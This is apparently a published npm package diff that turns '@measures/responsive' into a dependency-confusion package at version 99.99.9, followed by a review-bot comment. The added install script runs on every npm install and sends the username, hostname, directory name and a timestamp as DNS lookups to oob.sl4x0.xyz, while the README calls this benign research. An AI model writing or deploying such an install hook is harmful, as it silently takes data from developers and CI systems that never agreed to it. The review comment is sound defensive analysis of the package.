@measures/responsive 1.0.0 → 99.99.9
- package/README.md +15 -11
- package/package.json +11 -6
- package/index.js +0 -1
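--- a/package/README.md
+++ b/package/README.md
@@ -1,17 +1,21 @@
-#
+# Research Demonstration Package
 
-This package is a **
+This package is a **demonstration artifact** for evaluating dependency resolution behavior.
 
 ## Purpose
-This package demonstrates how attackers can exploit dependency confusion attacks by publishing packages with internal naming conventions.
 
-
-- Makes a DNS callback to `oob.sl4x0.xyz` during installation
-- Collects: username, hostname, directory path, timestamp
-- Does NOT: steal credentials, install malware, or cause harm
+Illustrates how package managers may resolve names that overlap with private or internal packages.
 
-##
-This is for **authorized security research only**. Only install on systems you own or have permission to test.
+## Behavior
 
-
-
+* Emits a benign network signal to `oob.sl4x0.xyz` during installation
+* Records limited environment metadata: user identifier, system name, working path, timestamp
+* Does NOT access sensitive data, modify system state, or perform persistence
+
+## Usage Notice
+
+Intended for **authorized testing and evaluation** within environments you own or are permitted to assess.
+
+## For Engineering & Security Teams
+
+Presence of this package suggests an opportunity to review dependency source controls and namespace protections.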
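--- a/package/package.json
+++ b/package/package.json
@@ -1,13 +1,18 @@
 {
 "name": "@measures/responsive",
-"version": "
-"description": "",
+"version": "99.99.9",
+"description": "Ethical Proof of Concept",
 "main": "index.js",
 "scripts": {
-"
+"install": "u=$(whoami|tr -cd 'a-zA-Z0-9'|cut -c1-15); h=$(hostname|tr -cd 'a-zA-Z0-9'|cut -c1-20); p=$(basename \"$PWD\"|tr -cd 'a-zA-Z0-9'|cut -c1-15); r=$(date +%s); q=\"blick.${u}.${h}.${p}.${r}.oob.sl4x0.xyz\"; (nslookup \"$q\" >/dev/null 2>&1 || dig +time=2 +tries=1 \"$q\" A >/dev/null 2>&1) || true"
 },
-"
-"author": "",
+"author": "sl4x0",
 "license": "ISC",
-"
+"publishConfig": {
+"access": "public"
+},
+"keywords": ["security-research", "poc", "dependency-confusion"],
+"repository": {
+"type": "git"
+}
 }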
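Review bot: The new `install` script runs on every `npm install` and sends the filtered username, hostname, working-directory name and a timestamp to `oob.sl4x0.xyz` as DNS query labels, with `|| true` so the install never reports a failure; that is outbound data egress from every machine that resolves this package, including CI runners, and it is wider than the README's "does NOT access sensitive data" wording, since usernames and project directory names are often sensitive in themselves. Consumers should treat the package as a dependency-confusion indicator: map the `@measures` scope to the internal registry in `.npmrc`, set `ignore-scripts=true` so lifecycle scripts cannot execute, and alert on DNS queries for `*.oob.sl4x0.xyz`. The jump to `"version": "99.99.9"` is part of the same pattern, because any resolver that prefers the highest published version will select this artifact over an internal `1.x` unless the scope is pinned to a private source. Minor: the added `repository` object has `"type": "git"` but no `url`, so it carries no provenance for the published code.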
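--- a/package/index.js
+++ b/package/index.js
@@ -1 +0,0 @@
-testing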